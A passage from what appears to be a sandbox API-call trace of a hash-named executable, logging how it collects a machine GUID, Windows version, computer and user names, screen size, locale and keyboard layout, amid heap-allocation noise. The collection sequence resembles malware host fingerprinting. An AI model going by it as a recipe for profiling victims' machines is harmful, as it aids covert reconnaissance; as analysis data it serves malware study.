0x0 [0109.675] RegCloseKey (hKey=0x35c) returned 0x0 [0109.675] CharToOemA (in: pSrc="03845cb8-7441-4a2f-8c0f-c90408af5778", pDst=0x19f518 | out: pDst="03845cb8-7441-4a2f-8c0f-c90408af5778") returned 1 [0109.675] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a1478 [0109.675] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a14b0 [0109.675] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970048 [0109.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14b0 | out: hHeap=0x29a0000) returned 1 [0109.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.675] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.675] GetLastError () returned 0x0 [0109.675] SetLastError (dwErrCode=0x0) [0109.675] GetLastError () returned 0x0 [0109.675] SetLastError (dwErrCode=0x0) [0109.675] GetLastError () returned 0x0 [0109.675] SetLastError (dwErrCode=0x0) [0109.675] GetLastError () returned 0x0 [0109.675] SetLastError (dwErrCode=0x0) [0109.675] GetLastError () returned 0x0 [0109.675] SetLastError (dwErrCode=0x0) [0109.675] GetLastError () returned 0x0 [0109.676] SetLastError (dwErrCode=0x0) [0109.676] GetLastError () returned 0x0 [0109.676] SetLastError (dwErrCode=0x0) [0109.676] GetLastError () returned 0x0 [0109.676] SetLastError (dwErrCode=0x0) [0109.676] GetLastError () returned 0x0 [0109.676] SetLastError (dwErrCode=0x0) [0109.676] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.676] GetCurrentProcessId () returned 0x5bc [0109.676] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5bc) returned 0x35c [0109.676] GetModuleFileNameExA (in: hProcess=0x35c, hModule=0x0, lpFilename=0x19f5d0, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x62 [0109.676] CloseHandle (hObject=0x35c) returned 1 [0109.677] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x3970048 [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] GetLastError () returned 0x0 [0109.677] SetLastError (dwErrCode=0x0) [0109.677] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.677] GetLastError () returned 0x0 [0109.678] SetLastError (dwErrCode=0x0) [0109.678] GetLastError () returned 0x0 [0109.678] SetLastError (dwErrCode=0x0) [0109.678] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetLastError () returned 0x0 [0109.679] SetLastError (dwErrCode=0x0) [0109.679] GetCurrentProcess () returned 0xffffffff [0109.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19f6d8 | out: Wow64Process=0x19f6d8*=1) returned 1 [0109.683] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x19f4d4 | out: phkResult=0x19f4d4*=0x35c) returned 0x0 [0109.770] RegQueryValueExA (in: hKey=0x35c, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x19f4d8, lpcbData=0x19f4d0*=0xff | out: lpType=0x0, lpData=0x19f4d8*=0x57, lpcbData=0x19f4d0*=0xf) returned 0x0 [0109.770] RegCloseKey (hKey=0x35c) returned 0x0 [0109.770] CharToOemA (in: pSrc="Windows 10 Pro", pDst=0x19f5d8 | out: pDst="Windows 10 Pro") returned 1 [0109.771] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0109.771] GetLastError () returned 0x0 [0109.771] SetLastError (dwErrCode=0x0) [0109.771] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.771] GetComputerNameA (in: lpBuffer=0x1976d8, nSize=0x1976d4 | out: lpBuffer="XC64ZB", nSize=0x1976d4) returned 1 [0109.771] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0109.771] GetLastError () returned 0xcb [0109.771] SetLastError (dwErrCode=0xcb) [0109.771] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.771] GetUserNameA (in: lpBuffer=0x19f5d4, pcbBuffer=0x19f5d0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19f5d0) returned 1 [0109.772] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1428 [0109.772] GetLastError () returned 0xcb [0109.772] SetLastError (dwErrCode=0xcb) [0109.772] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.772] CreateDCA (pwszDriver="DISPLAY", pwszDevice=0x0, pszPort=0x0, pdm=0x0) returned 0xa0100d0 [0109.773] GetDeviceCaps (hdc=0xa0100d0, index=8) returned 1440 [0109.773] GetDeviceCaps (hdc=0xa0100d0, index=10) returned 900 [0109.773] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0109.773] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a1428 [0109.775] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1438 [0109.775] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.775] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x10) returned 0x29a10e0 [0109.775] GetLastError () returned 0xcb [0109.775] SetLastError (dwErrCode=0xcb) [0109.775] GetLastError () returned 0xcb [0109.775] SetLastError (dwErrCode=0xcb) [0109.775] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x3970048 [0109.775] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0109.775] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.776] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1338 | out: hHeap=0x29a0000) returned 1 [0109.776] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a10f8 [0109.776] GetLastError () returned 0xcb [0109.776] SetLastError (dwErrCode=0xcb) [0109.776] GetLastError () returned 0xcb [0109.776] SetLastError (dwErrCode=0xcb) [0109.776] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x29a1338 [0109.776] GetLastError () returned 0xcb [0109.776] SetLastError (dwErrCode=0xcb) [0109.776] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0109.776] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.776] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.776] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1478 [0109.776] GetLastError () returned 0xcb [0109.777] SetLastError (dwErrCode=0xcb) [0109.777] GetLastError () returned 0xcb [0109.777] SetLastError (dwErrCode=0xcb) [0109.777] GetLastError () returned 0xcb [0109.777] SetLastError (dwErrCode=0xcb) [0109.777] GetLastError () returned 0xcb [0109.777] SetLastError (dwErrCode=0xcb) [0109.777] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x3970048 [0109.777] GetLastError () returned 0xcb [0109.777] SetLastError (dwErrCode=0xcb) [0109.777] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0109.777] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.777] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1338 | out: hHeap=0x29a0000) returned 1 [0109.777] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.777] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10f8 | out: hHeap=0x29a0000) returned 1 [0109.778] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a10f8 [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.783] SetLastError (dwErrCode=0xcb) [0109.783] GetLastError () returned 0xcb [0109.784] SetLastError (dwErrCode=0xcb) [0109.784] GetLastError () returned 0xcb [0109.784] SetLastError (dwErrCode=0xcb) [0109.784] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1478 [0109.784] GetLastError () returned 0xcb [0109.784] SetLastError (dwErrCode=0xcb) [0109.784] GetLastError () returned 0xcb [0109.784] SetLastError (dwErrCode=0xcb) [0109.784] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x29a1338 [0109.784] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0109.784] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.784] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a1498 [0109.785] GetLastError () returned 0xcb [0109.785] SetLastError (dwErrCode=0xcb) [0109.785] GetLastError () returned 0xcb [0109.785] SetLastError (dwErrCode=0xcb) [0109.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x3970048 [0109.785] GetLastError () returned 0xcb [0109.785] SetLastError (dwErrCode=0xcb) [0109.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0109.785] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.785] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1338 | out: hHeap=0x29a0000) returned 1 [0109.785] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2) returned 0x29a14a8 [0109.785] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x1) returned 0x29a14b8 [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6) returned 0x29a14c8 [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x5) returned 0x29a14d8 [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.786] SetLastError (dwErrCode=0xcb) [0109.786] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x8, Size=0xd8) returned 0x29a1338 [0109.787] GetLastError () returned 0xcb [0109.787] SetLastError (dwErrCode=0xcb) [0109.787] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x355) returned 0x3970330 [0109.787] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970330 | out: hHeap=0x29a0000) returned 1 [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1498 | out: hHeap=0x29a0000) returned 1 [0109.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8) returned 0x29a1498 [0109.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970048 [0109.788] GetLastError () returned 0xcb [0109.788] SetLastError (dwErrCode=0xcb) [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1438 | out: hHeap=0x29a0000) returned 1 [0109.788] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x29a1428 [0109.788] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a1448 [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.789] GetLastError () returned 0xcb [0109.789] SetLastError (dwErrCode=0xcb) [0109.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970470 [0109.790] GetLastError () returned 0xcb [0109.790] SetLastError (dwErrCode=0xcb) [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970470 | out: hHeap=0x29a0000) returned 1 [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1448 | out: hHeap=0x29a0000) returned 1 [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1428 | out: hHeap=0x29a0000) returned 1 [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970560 [0109.790] GetLastError () returned 0xcb [0109.790] SetLastError (dwErrCode=0xcb) [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970560 | out: hHeap=0x29a0000) returned 1 [0109.790] GetUserDefaultLocaleName (in: lpLocaleName=0x19f620, cchLocaleName=85 | out: lpLocaleName="en-US") returned 6 [0109.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="en-US", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0109.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x6) returned 0x29a10d0 [0109.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="en-US", cchWideChar=6, lpMultiByteStr=0x29a10d0, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="en-US", lpUsedDefaultChar=0x0) returned 6 [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.790] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970538 [0109.790] GetLastError () returned 0xcb [0109.790] SetLastError (dwErrCode=0xcb) [0109.790] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970538 | out: hHeap=0x29a0000) returned 1 [0109.794] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0109.871] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x71fc70 [0109.871] GetKeyboardLayoutList (in: nBuff=1, lpList=0x71fc70 | out: lpList=0x71fc70) returned 1 [0109.871] GetLocaleInfoA (in: Locale=0x409, LCType=0x2, lpLCData=0x19f4cc, cchData=512 | out: lpLCData="English (United States)") returned 24 [0109.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39703d0 [0109.907] LocalFree (hMem=0x71fc70) returned 0x0 [0109.907] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x3970048 [0109.907] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39703d0 | out: hHeap=0x29a0000) returned 1 [0109.908] GetLastError () returned 0x0 [0109.908] SetLastError (dwErrCode=0x0) [0109.908] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.908] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19f4e4 | out: lpSystemTimeAsFileTime=0x19f4e4*(dwLowDateTime=0x358b5179, dwHighDateTime=0x1d7b3bd)) [0109.908] GetLastError () returned 0x0 [0109.908] SetLastError (dwErrCode=0x0) [0109.908] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x24) returned 0x29a1428 [0109.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.909] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.910] GetLastError () returned 0x0 [0109.910] SetLastError (dwErrCode=0x0) [0109.910] GetLastError () returned 0x0 [0109.910] SetLastError (dwErrCode=0x0) [0109.910] GetLastError () returned 0x0 [0109.910] SetLastError (dwErrCode=0x0) [0109.910] GetLastError () returned 0x0 [0109.910] SetLastError (dwErrCode=0x0) [0109.910] GetLastError () returned 0x0 [0109.910] SetLastError (dwErrCode=0x0) [0109.910] GetLastError () returned 0x0 [0109.911] SetLastError (dwErrCode=0x0) [0109.911] GetLastError () returned 0x0 [0109.911] SetLastError (dwErrCode=0x0) [0109.911] GetLastError () returned 0x0 [0109.911] SetLastError (dwErrCode=0x0) [0109.911] GetLastError () returned 0x0 [0109.911] SetLastError (dwErrCode=0x0) [0109.911] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705b0 [0109.911] GetLastError () returned 0x0 [0109.911] SetLastError (dwErrCode=0x0) [0109.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705b0 | out: hHeap=0x29a0000) returned 1 [0109.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.912] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.912] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.913] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.913] GetLastError () returned 0x0 [0109.913] SetLastError (dwErrCode=0x0) [0109.913] GetLastError () returned 0x0 [0109.913] SetLastError (dwErrCode=0x0) [0109.913] GetLastError () returned 0x0 [0109.913] SetLastError (dwErrCode=0x0) [0109.913] GetLastError () returned 0x0 [0109.914] SetLastError (dwErrCode=0x0) [0109.914] GetLastError () returned 0x0 [0109.914] SetLastError (dwErrCode=0x0) [0109.914] GetLastError () returned 0x0 [0109.914] SetLastError (dwErrCode=0x0) [0109.914] GetLastError () returned 0x0 [0109.914] SetLastError (dwErrCode=0x0) [0109.914] GetLastError () returned 0x0 [0109.914] SetLastError (dwErrCode=0x0) [0109.914] GetLastError () returned 0x0 [0109.914] SetLastError (dwErrCode=0x0) [0109.915] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39705d8 [0109.915] GetLastError () returned 0x0 [0109.915] SetLastError (dwErrCode=0x0) [0109.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39705d8 | out: hHeap=0x29a0000) returned 1 [0109.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.915] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.916] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.917] GetLastError () returned 0x0 [0109.917] SetLastError (dwErrCode=0x0) [0109.917] GetLastError () returned 0x0 [0109.917] SetLastError (dwErrCode=0x0) [0109.917] GetLastError () returned 0x0 [0109.917] SetLastError (dwErrCode=0x0) [0109.917] GetLastError () returned 0x0 [0109.917] SetLastError (dwErrCode=0x0) [0109.917] GetLastError () returned 0x0 [0109.917] SetLastError (dwErrCode=0x0) [0109.917] GetLastError () returned 0x0 [0109.918] SetLastError (dwErrCode=0x0) [0109.918] GetLastError () returned 0x0 [0109.918] SetLastError (dwErrCode=0x0) [0109.918] GetLastError () returned 0x0 [0109.918] SetLastError (dwErrCode=0x0) [0109.918] GetLastError () returned 0x0 [0109.918] SetLastError (dwErrCode=0x0) [0109.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x39704c0 [0109.919] GetLastError () returned 0x0 [0109.919] SetLastError (dwErrCode=0x0) [0109.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39704c0 | out: hHeap=0x29a0000) returned 1 [0109.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.919] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.919] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.920] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.920] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.920] GetLastError () returned 0x0 [0109.920] SetLastError (dwErrCode=0x0) [0109.921] GetLastError () returned 0x0 [0109.921] SetLastError (dwErrCode=0x0) [0109.921] GetLastError () returned 0x0 [0109.921] SetLastError (dwErrCode=0x0) [0109.921] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x3970510 [0109.921] GetLastError () returned 0x0 [0109.921] SetLastError (dwErrCode=0x0) [0109.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970510 | out: hHeap=0x29a0000) returned 1 [0109.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a14a8 | out: hHeap=0x29a0000) returned 1 [0109.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.921] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a10d0 | out: hHeap=0x29a0000) returned 1 [0109.921] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a10d0 [0109.921] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x18) returned 0x3970048 [0109.921] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x4) returned 0x29a14a8 [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.922] GetLastError () returned 0x0 [0109.922] SetLastError (dwErrCode=0x0) [0109.923] RtlAllocateHeap 